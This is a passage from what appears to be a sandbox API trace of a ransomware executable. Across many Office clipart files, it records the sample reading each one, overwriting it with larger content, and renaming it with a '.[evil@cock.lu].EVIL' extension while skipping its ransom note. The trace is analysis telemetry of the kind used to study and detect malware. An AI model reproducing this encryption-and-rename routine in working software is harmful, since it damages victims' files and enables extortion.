_SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.913] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285796.WMF") returned 69 [0153.913] wcscmp (_String1="J0285796.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.913] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0285796.WMF") returned 0x0 [0153.913] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285796.WMF") returned 0x45 [0153.913] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285796.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285796.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.915] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3550, lpOverlapped=0x0) returned 1 [0153.926] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.926] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.926] _errno () returned 0x84b1160840 [0153.926] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.926] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x3560, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3560, lpOverlapped=0x0) returned 1 [0153.926] CloseHandle (hObject=0x1a8) returned 1 [0153.926] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285796.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.927] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.927] __uncaught_exception () returned 0x84b1160800 [0153.927] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.927] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285796.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285796.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285796.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285796.wmf.[evil@cock.lu].evil")) returned 1 [0153.928] ??_V@YAXPEAX@Z () returned 0x1 [0153.932] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285796.WMF", dwFileAttributes=0x200) returned 0 [0153.932] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.932] wcsstr (_Str="J0285808.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.932] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285808.WMF") returned 69 [0153.932] wcscmp (_String1="J0285808.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.932] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0285808.WMF") returned 0x0 [0153.932] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285808.WMF") returned 0x45 [0153.932] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285808.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285808.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.934] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x23f4, lpOverlapped=0x0) returned 1 [0153.944] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.944] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.944] _errno () returned 0x84b1160840 [0153.944] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.944] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x2400, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2400, lpOverlapped=0x0) returned 1 [0153.944] CloseHandle (hObject=0x1a8) returned 1 [0153.944] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285808.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.944] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.944] __uncaught_exception () returned 0x84b1160800 [0153.944] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.945] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285808.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285808.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285808.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285808.wmf.[evil@cock.lu].evil")) returned 1 [0153.946] ??_V@YAXPEAX@Z () returned 0x1 [0153.949] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285808.WMF", dwFileAttributes=0x200) returned 0 [0153.949] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.949] wcsstr (_Str="J0285820.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.949] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285820.WMF") returned 69 [0153.949] wcscmp (_String1="J0285820.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.949] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0285820.WMF") returned 0x0 [0153.949] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285820.WMF") returned 0x45 [0153.949] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285820.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285820.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.951] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2210, lpOverlapped=0x0) returned 1 [0153.960] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.960] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.960] _errno () returned 0x84b1160840 [0153.960] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.960] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x2220, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2220, lpOverlapped=0x0) returned 1 [0153.961] CloseHandle (hObject=0x1a8) returned 1 [0153.961] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285820.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.961] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.961] __uncaught_exception () returned 0x84b1160800 [0153.961] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.961] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285820.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285820.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285820.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285820.wmf.[evil@cock.lu].evil")) returned 1 [0153.962] ??_V@YAXPEAX@Z () returned 0x1 [0153.966] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285820.WMF", dwFileAttributes=0x200) returned 0 [0153.966] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.966] wcsstr (_Str="J0285822.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.966] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285822.WMF") returned 69 [0153.966] wcscmp (_String1="J0285822.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.966] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0285822.WMF") returned 0x0 [0153.966] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285822.WMF") returned 0x45 [0153.966] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285822.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285822.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.968] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x21a0, lpOverlapped=0x0) returned 1 [0153.978] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.978] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.978] _errno () returned 0x84b1160840 [0153.978] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.978] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x21c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x21c0, lpOverlapped=0x0) returned 1 [0153.978] CloseHandle (hObject=0x1a8) returned 1 [0153.978] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285822.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.978] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.979] __uncaught_exception () returned 0x84b1160800 [0153.979] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.979] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285822.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285822.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285822.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285822.wmf.[evil@cock.lu].evil")) returned 1 [0153.980] ??_V@YAXPEAX@Z () returned 0x1 [0153.983] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285822.WMF", dwFileAttributes=0x200) returned 0 [0153.983] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.983] wcsstr (_Str="J0287018.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.983] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287018.WMF") returned 69 [0153.983] wcscmp (_String1="J0287018.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.983] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0287018.WMF") returned 0x0 [0153.983] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287018.WMF") returned 0x45 [0153.984] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287018.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287018.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.986] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7898, lpOverlapped=0x0) returned 1 [0153.995] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.995] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.995] _errno () returned 0x84b1160840 [0153.995] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.995] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x78a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x78a0, lpOverlapped=0x0) returned 1 [0153.995] CloseHandle (hObject=0x1a8) returned 1 [0153.995] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287018.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.995] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.995] __uncaught_exception () returned 0x84b1160800 [0153.995] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.996] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287018.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287018.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287018.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287018.wmf.[evil@cock.lu].evil")) returned 1 [0153.997] ??_V@YAXPEAX@Z () returned 0x1 [0154.000] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287018.WMF", dwFileAttributes=0x200) returned 0 [0154.000] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.000] wcsstr (_Str="J0287019.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.000] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287019.WMF") returned 69 [0154.000] wcscmp (_String1="J0287019.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.000] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0287019.WMF") returned 0x0 [0154.000] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287019.WMF") returned 0x45 [0154.000] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287019.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287019.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.003] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x931a, lpOverlapped=0x0) returned 1 [0154.012] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.012] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.012] _errno () returned 0x84b1160840 [0154.012] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.012] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x9320, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9320, lpOverlapped=0x0) returned 1 [0154.012] CloseHandle (hObject=0x1a8) returned 1 [0154.012] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287019.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.012] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.012] __uncaught_exception () returned 0x84b1160800 [0154.012] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.015] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287019.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287019.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287019.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287019.wmf.[evil@cock.lu].evil")) returned 1 [0154.016] ??_V@YAXPEAX@Z () returned 0x1 [0154.019] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287019.WMF", dwFileAttributes=0x200) returned 0 [0154.020] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.020] wcsstr (_Str="J0287020.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.020] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287020.WMF") returned 69 [0154.020] wcscmp (_String1="J0287020.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.020] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0287020.WMF") returned 0x0 [0154.020] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287020.WMF") returned 0x45 [0154.020] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287020.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287020.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.022] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x80d8, lpOverlapped=0x0) returned 1 [0154.030] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.030] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.030] _errno () returned 0x84b1160840 [0154.031] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.031] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x80e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x80e0, lpOverlapped=0x0) returned 1 [0154.032] CloseHandle (hObject=0x1a8) returned 1 [0154.032] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287020.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.032] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.032] __uncaught_exception () returned 0x84b1160800 [0154.032] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.032] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287020.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287020.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287020.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287020.wmf.[evil@cock.lu].evil")) returned 1 [0154.033] ??_V@YAXPEAX@Z () returned 0x1 [0154.037] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287020.WMF", dwFileAttributes=0x200) returned 0 [0154.037] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.037] wcsstr (_Str="J0287024.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.037] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287024.WMF") returned 69 [0154.037] wcscmp (_String1="J0287024.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.037] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0287024.WMF") returned 0x0 [0154.037] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287024.WMF") returned 0x45 [0154.037] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287024.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287024.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0154.040] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xc6d2, lpOverlapped=0x0) returned 1 [0154.049] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.049] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0154.049] _errno () returned 0x84b1160840 [0154.049] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.049] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0xc6e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xc6e0, lpOverlapped=0x0) returned 1 [0154.049] CloseHandle (hObject=0x1a8) returned 1 [0154.049] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287024.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0154.049] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0154.049] __uncaught_exception () returned 0x84b1160800 [0154.050] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0154.050] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287024.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287024.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287024.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287024.wmf.[evil@cock.lu].evil")) returned 1 [0154.051] ??_V@YAXPEAX@Z () returned 0x1 [0154.054] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287024.WMF", dwFileAttributes=0x200) returned 0 [0154.054] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0154.054] wcsstr (_Str="J0287408.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0154.054] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287408.WMF") returned 69 [0154.054] wcscmp (_String1="J0287408.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0154.054] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0287408.WMF") returned 0x0 [0154.054] wcslen (_String="C:\\\\Program Files\\Microsoft 